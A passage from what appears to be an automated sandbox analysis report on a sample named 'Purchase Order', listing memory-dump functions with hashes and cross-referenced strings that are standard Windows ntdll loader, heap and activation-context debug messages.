                                                            • Source File: 00000003.00000002.1835504450.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_1830000_Purchase Order.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 3e1e99cafa39d71fecc10e5af6958517371e8321510b08f282d64324b66b16b0
                                                            • Instruction ID: 91e6ff77d60969ba2104efb513c3c30701053e1d2cfd39a77ba95affe8470a3a
                                                            • Opcode Fuzzy Hash: 3e1e99cafa39d71fecc10e5af6958517371e8321510b08f282d64324b66b16b0
                                                            • Instruction Fuzzy Hash: 2DB09B719015C5CAEA11E7644A08717790577D1701F55C061D3034651F4738C2D5E676

                                                            Non-executed Functions

                                                            Function 018E2349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1835504450.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_1830000_Purchase Order.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                            • API String ID: 0-2160512332
                                                            • Opcode ID: 351dbd1d1f9626c983c490a91a4bd5b3402c6457c3fb2d37faae8cb2803bddc2
                                                            • Instruction ID: a306e328559e54c3a75135fb65861319b4abcdb848c54d2aac584846828c809d
                                                            • Opcode Fuzzy Hash: 351dbd1d1f9626c983c490a91a4bd5b3402c6457c3fb2d37faae8cb2803bddc2
                                                            • Instruction Fuzzy Hash: 0C92DF71608346AFE721DF28C888F6BB7EABB85714F04481DFA94D7251D770EA44CB92
                                                            Function 01898620 Relevance: 17.7, Strings: 14, Instructions: 223COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            • Thread is in a state in which it cannot own a critical section, xrefs: 018D5543
                                                            • Invalid debug info address of this critical section, xrefs: 018D54B6
                                                            • double initialized or corrupted critical section, xrefs: 018D5508
                                                            • corrupted critical section, xrefs: 018D54C2
                                                            • 8, xrefs: 018D52E3
                                                            • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 018D54CE
                                                            • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 018D54E2
                                                            • Thread identifier, xrefs: 018D553A
                                                            • Critical section address, xrefs: 018D5425, 018D54BC, 018D5534
                                                            • Critical section debug info address, xrefs: 018D541F, 018D552E
                                                            • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 018D540A, 018D5496, 018D5519
                                                            • undeleted critical section in freed memory, xrefs: 018D542B
                                                            • Critical section address., xrefs: 018D5502
                                                            • Address of the debug info found in the active list., xrefs: 018D54AE, 018D54FA
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1835504450.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_1830000_Purchase Order.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                            • API String ID: 0-2368682639
                                                            • Opcode ID: 5f7ce4c2c4ce2ca8599f2f6b9c6ffe527bdae050c908494a625a08491950a001
                                                            • Instruction ID: 0620eb73e289c4cf88dfec7b7694b7e7b82cf28ac8661c07c1df2ec276af675f
                                                            • Opcode Fuzzy Hash: 5f7ce4c2c4ce2ca8599f2f6b9c6ffe527bdae050c908494a625a08491950a001
                                                            • Instruction Fuzzy Hash: 8481ACB1A41349EFDB21CF99C884BAEBBB5FB0AB14F14411AF505F7240D775AA40CB90
                                                            Function 018929F9 Relevance: 14.2, Strings: 11, Instructions: 411COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            • RtlpResolveAssemblyStorageMapEntry, xrefs: 018D261F
                                                            • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 018D2412
                                                            • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 018D2602
                                                            • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 018D25EB
                                                            • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 018D2506
                                                            • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 018D2624
                                                            • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 018D2498
                                                            • @, xrefs: 018D259B
                                                            • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 018D2409
                                                            • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 018D22E4
                                                            • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 018D24C0
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1835504450.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_1830000_Purchase Order.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                            • API String ID: 0-4009184096
                                                            • Opcode ID: 64bc95636d0c7f0b2cbcb59579e3e37647f51c9ce88a81ee198f053bd6c5eb10
                                                            • Instruction ID: c58adea46d63e78393972b58942c742d72fe13ba4dc6b140fe64dea789b2f32a
                                                            • Opcode Fuzzy Hash: 64bc95636d0c7f0b2cbcb59579e3e37647f51c9ce88a81ee198f053bd6c5eb10
                                                            • Instruction Fuzzy Hash: 610250B1D00269AFDF31DB58CC80B9AB7B9AF54318F4441DAA609E7241EB709F84CF59
                                                            Function 01908B42 Relevance: 12.6, Strings: 10, Instructions: 146COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1835504450.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_1830000_Purchase Order.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                            • API String ID: 0-2515994595
                                                            • Opcode ID: d6eda908af9c886a02d00bba650c8a50af6c2113c836608e2b637a688208027d
                                                            • Instruction ID: 3796c00efc7fabe2329871ceacf7892311533be66528b867f9b07facc6e8e944
                                                            • Opcode Fuzzy Hash: d6eda908af9c886a02d00bba650c8a50af6c2113c836608e2b637a688208027d
                                                            • Instruction Fuzzy Hash: FB518EB1A04315AFD726DF188844BABBBECAF94750F144A1DEA9DC2281E770D609C792
                                                            Function 01910274 Relevance: 10.3, Strings: 8, Instructions: 348COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1835504450.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_1830000_Purchase Order.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                            • API String ID: 0-1700792311
                                                            • Opcode ID: ad575231fad2d3ad13a2eb6304901087ddc875b52ae4b2d32f640854e15854c5
                                                            • Instruction ID: 533b334302240e05703be164d7095098120d59572ad315e9f7b4b75d0b4f7511
                                                            • Opcode Fuzzy Hash: ad575231fad2d3ad13a2eb6304901087ddc875b52ae4b2d32f640854e15854c5
                                                            • Instruction Fuzzy Hash: F4D1F031604689DFDB22DF68C440AADBBF6FF5A700F0C8449F8499B256E7369AC1CB51
                                                            Function 018E89B3 Relevance: 9.0, Strings: 7, Instructions: 259COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            • HandleTraces, xrefs: 018E8C8F
                                                            • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 018E8A3D
                                                            • VerifierDebug, xrefs: 018E8CA5
                                                            • VerifierFlags, xrefs: 018E8C50
                                                            • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 018E8A67
                                                            • VerifierDlls, xrefs: 018E8CBD
                                                            • AVRF: -*- final list of providers -*- , xrefs: 018E8B8F
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1835504450.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_1830000_Purchase Order.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                            • API String ID: 0-3223716464
                                                            • Opcode ID: 76601a613e7cde53634ed72bf88f50c6417f24b5b3b8eb279ef0ca6b235e60f0
                                                            • Instruction ID: ee931efdce7b7ac5ad2420b2523b192aea69bb29f66e77a40c7d2cdbeca4131f
                                                            • Opcode Fuzzy Hash: 76601a613e7cde53634ed72bf88f50c6417f24b5b3b8eb279ef0ca6b235e60f0
                                                            • Instruction Fuzzy Hash: 1B912571649706EFEB21DF2C8888B1E77E4AB97754F060418FA45EB242D770AF00C792
                                                            Function 0186EA80 Relevance: 8.6, Strings: 6, Instructions: 1073COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1835504450.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_1830000_Purchase Order.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                            • API String ID: 0-1109411897
                                                            • Opcode ID: 6051ead1c4854303be9461607b9e285e0d3ec967a26276374a4135afbc115e64
                                                            • Instruction ID: 3b77b655f59ee3ab4fca7237410eb2801f1d85fba1adf029ffd5f3f37fea4cf2
                                                            • Opcode Fuzzy Hash: 6051ead1c4854303be9461607b9e285e0d3ec967a26276374a4135afbc115e64
                                                            • Instruction Fuzzy Hash: 56A22774A0562ACBDB65CF18CCA8BA9BBB5AF45704F2442E9D909E7251DB309FC5CF00
                                                            Function 018963FF Relevance: 7.8, Strings: 6, Instructions: 261COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1835504450.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_1830000_Purchase Order.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                            • API String ID: 0-792281065
                                                            • Opcode ID: d756b681a7f33be34b1b3c330868ec246ef73ffd94a469916c78ba18994056ec
                                                            • Instruction ID: 41c0861ccc94c573cb86d7c254de2fe22543797d83534b352b470ffc372c66b2
                                                            • Opcode Fuzzy Hash: d756b681a7f33be34b1b3c330868ec246ef73ffd94a469916c78ba18994056ec
                                                            • Instruction Fuzzy Hash: 38912B71B043199BEF35DF6CD885BAE7BA1BB41B24F180129E904FB681EB749B01C791
                                                            Function 0185645D Relevance: 7.6, Strings: 6, Instructions: 150COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 018B9A2A
                                                            • apphelp.dll, xrefs: 01856496
                                                            • minkernel\ntdll\ldrinit.c, xrefs: 018B9A11, 018B9A3A
                                                            • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 018B99ED
                                                            • Getting the shim engine exports failed with status 0x%08lx, xrefs: 018B9A01
                                                            • LdrpInitShimEngine, xrefs: 018B99F4, 018B9A07, 018B9A30
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1835504450.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_1830000_Purchase Order.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                            • API String ID: 0-204845295
                                                            • Opcode ID: c94a6a79b5f8114c81daa61d7420ee971df3dd3228fe9a9cf8592dcef6e5a529
                                                            • Instruction ID: 287c8f2f22a3f545ed81a6aeeac0980b08dac1002d9c995cf74d87a7272890d2
                                                            • Opcode Fuzzy Hash: c94a6a79b5f8114c81daa61d7420ee971df3dd3228fe9a9cf8592dcef6e5a529
                                                            • Instruction Fuzzy Hash: 755191716483099FE721DF28D881AAB7BE5FB84748F54051DFA85E7251EA30EB04CB93
                                                            Function 0189C6A6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            • LdrpInitializeImportRedirection, xrefs: 018D8177, 018D81EB
                                                            • LdrpInitializeProcess, xrefs: 0189C6C4
                                                            • minkernel\ntdll\ldrinit.c, xrefs: 0189C6C3
                                                            • Loading import redirection DLL: '%wZ', xrefs: 018D8170
                                                            • Unable to build import redirection Table, Status = 0x%x, xrefs: 018D81E5
                                                            • minkernel\ntdll\ldrredirect.c, xrefs: 018D8181, 018D81F5
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1835504450.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_1830000_Purchase Order.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                            • API String ID: 0-475462383
                                                            • Opcode ID: 95f2639297372f960550dd599a6b4338b89b8d8a2f3a8b843847763d59e60a48
                                                            • Instruction ID: 4f77e2368e067d7f92b66dc055dcedb9b673340a67ae21fadabf3e49ae932ae2
                                                            • Opcode Fuzzy Hash: 95f2639297372f960550dd599a6b4338b89b8d8a2f3a8b843847763d59e60a48
                                                            • Instruction Fuzzy Hash: 8131F3716483069BD310EE2CDC86E1AB7D5AF95B10F05051CF944EB291EA20EF04C7E3
                                                            Function 01892674 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 018D219F
                                                            • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 018D21BF
                                                            • RtlGetAssemblyStorageRoot, xrefs: 018D2160, 018D219A, 018D21BA
                                                            • SXS: %s() passed the empty activation context, xrefs: 018D2165
                                                            • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 018D2180
                                                            • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 018D2178
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1835504450.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_1830000_Purchase Order.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                            • API String ID: 0-861424205
                                                            • Opcode ID: 1ae2352ee5add0c1b0ca5a221150b34a23adc6c951d492b48b81d1e9dd8f9ac0
                                                            • Instruction ID: f5d84654d52a1e7b741023faf3e5beddb9e73318508f0568a453047eabc59aed
                                                            • Opcode Fuzzy Hash: 1ae2352ee5add0c1b0ca5a221150b34a23adc6c951d492b48b81d1e9dd8f9ac0
                                                            • Instruction Fuzzy Hash: 6C31E936B4031977FF219AA98C85F5F7B6ADB95B54F098059BB04FB240D770AB00C7A1
                                                            Function 018A096E Relevance: 6.6, APIs: 4, Instructions: 606COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 018A2DF0: LdrInitializeThunk.NTDLL ref: 018A2DFA
                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 018A0BA3
                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 018A0BB6
                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 018A0D60
                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 018A0D74
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1835504450.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_1830000_Purchase Order.jbxd
                                                            Similarity
                                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                            • String ID:
                                                            • API String ID: 1404860816-0
                                                            • Opcode ID: b4bbf9563f151a46bb699ded3a1205c3df06fe0cfab3d83c5f76857a73a001e9
                                                            • Instruction ID: 6b0b78d63afdb27dd50dcafecca5c02206bcb7988fdb7cc014a6ac79de9a1f41
                                                            • Opcode Fuzzy Hash: b4bbf9563f151a46bb699ded3a1205c3df06fe0cfab3d83c5f76857a73a001e9
                                                            • Instruction Fuzzy Hash: 3D426D71900715DFEB21CF28C880BAAB7F5FF44314F5485A9E989EB241E770AA85CF61
                                                            Function 0186A3C0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1835504450.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_1830000_Purchase Order.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                            • API String ID: 0-379654539
                                                            • Opcode ID: 3416ed2c4116927bee20d7794e52a9d6a718de0424d2ba363877832cc8a475e7
                                                            • Instruction ID: 2b7091cde47a09a3321cf48bfd94486aa241375fbe0b3dd420a76a066bfb385f
                                                            • Opcode Fuzzy Hash: 3416ed2c4116927bee20d7794e52a9d6a718de0424d2ba363877832cc8a475e7
                                                            • Instruction Fuzzy Hash: FAC179741083868FD719CF58C484B6AB7E8BF84708F04496EF996EB291E734DA49CB52
                                                            Function 01898402 Relevance: 5.3, Strings: 4, Instructions: 263COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            • @, xrefs: 01898591
                                                            • LdrpInitializeProcess, xrefs: 01898422
                                                            • minkernel\ntdll\ldrinit.c, xrefs: 01898421
                                                            • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 0189855E
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1835504450.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_1830000_Purchase Order.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                            • API String ID: 0-1918872054
                                                            • Opcode ID: 2d55c51f477731903bc7315a07305f947a19b06376d6561cdd02b333e686282c
                                                            • Instruction ID: 65ae609c2014e646fcff24115986dd690ea3e74ddbaaf7c7b56da426e154fd28
                                                            • Opcode Fuzzy Hash: 2d55c51f477731903bc7315a07305f947a19b06376d6561cdd02b333e686282c
                                                            • Instruction Fuzzy Hash: 87917C7150834AAFEB21DF65CC80EABBBE8BF85744F44492EFA84D2151E734DA058B53
                                                            Function 0189273C Relevance: 5.2, Strings: 4, Instructions: 249COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 018D22B6
                                                            • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 018D21D9, 018D22B1
                                                            • .Local, xrefs: 018928D8
                                                            • SXS: %s() passed the empty activation context, xrefs: 018D21DE
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1835504450.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_1830000_Purchase Order.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                            • API String ID: 0-1239276146
                                                            • Opcode ID: 0b1a59213902272b0e6c6dd49c877dc75ec5cb9f0c7bfdbf735517502824d53b
                                                            • Instruction ID: 7c3209e2e370c5f1dee1a9e53c20b7a5b99b0be9b6f45cebbbe38fd0da439afd
                                                            • Opcode Fuzzy Hash: 0b1a59213902272b0e6c6dd49c877dc75ec5cb9f0c7bfdbf735517502824d53b
                                                            • Instruction Fuzzy Hash: 1EA17D31941229ABDF25CF68DC84BA9B7B2BF58354F1941E9E908EB251D7309F80CF91
                                                            Function 01894AD0 Relevance: 5.2, Strings: 4, Instructions: 228COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            • RtlDeactivateActivationContext, xrefs: 018D3425, 018D3432, 018D3451
                                                            • SXS: %s() called with invalid flags 0x%08lx, xrefs: 018D342A
                                                            • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 018D3456
                                                            • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 018D3437
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1835504450.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_1830000_Purchase Order.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                                            • API String ID: 0-1245972979
                                                            • Opcode ID: 51e688fcc665fa2f943d3234434e3972d05bb30f8bf706709d850df25ad9ead0
                                                            • Instruction ID: 9a44a6035b793eda918e7ba32bce5a2289810aa8caa68ab3cdb90b876b7bceed
                                                            • Opcode Fuzzy Hash: 51e688fcc665fa2f943d3234434e3972d05bb30f8bf706709d850df25ad9ead0
                                                            • Instruction Fuzzy Hash: 776127766007169FDB22CF1CC981B2AB7E5FF90B54F18851DE955DB240D738EA02CB92
                                                            Function 018664AB Relevance: 5.2, Strings: 4, Instructions: 211COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 018C0FE5
                                                            • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 018C1028
                                                            • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 018C106B
                                                            • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 018C10AE
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1835504450.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_1830000_Purchase Order.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                            • API String ID: 0-1468400865
                                                            • Opcode ID: 875afd53b3f10578156a4619de93ad5c3ca4abe77fedd0c3de20e09cf242379a
                                                            • Instruction ID: 37398d2e7dab51193477c2ef7c58a2d035e302222d6d9469be85b547cd64d1f1
                                                            • Opcode Fuzzy Hash: 875afd53b3f10578156a4619de93ad5c3ca4abe77fedd0c3de20e09cf242379a
                                                            • Instruction Fuzzy Hash: AD71E0B19043459FDB60DF18C889B9B7BACAF95764F500468F948CB246E334D688CBD2
                                                            Function 0188245A Relevance: 5.1, Strings: 4, Instructions: 111COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 018CA992
                                                            • apphelp.dll, xrefs: 01882462
                                                            • LdrpDynamicShimModule, xrefs: 018CA998
                                                            • minkernel\ntdll\ldrinit.c, xrefs: 018CA9A2
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1835504450.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_1830000_Purchase Order.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                            • API String ID: 0-176724104
                                                            • Opcode ID: 99932f5a79938380c917e5fa2389aac0bf33a7fde4bbb4ba55f2c9232396670b
                                                            • Instruction ID: 64c51a1e8c547694cf8b3e183172d8591cb9616e2f772992d0b3194d2d0ca7e3
                                                            • Opcode Fuzzy Hash: 99932f5a79938380c917e5fa2389aac0bf33a7fde4bbb4ba55f2c9232396670b
                                                            • Instruction Fuzzy Hash: DB314871A00309EBDB399F6DD885AAABBB5FB80B04F15001DF910F7245E7709B81CB91
                                                            Function 018729A0 Relevance: 4.7, Strings: 3, Instructions: 966COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            • HEAP: , xrefs: 01873264
                                                            • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 0187327D
                                                            • HEAP[%wZ]: , xrefs: 01873255
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1835504450.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_1830000_Purchase Order.jbxd
                                                            Similarity
                                                            • API ID:
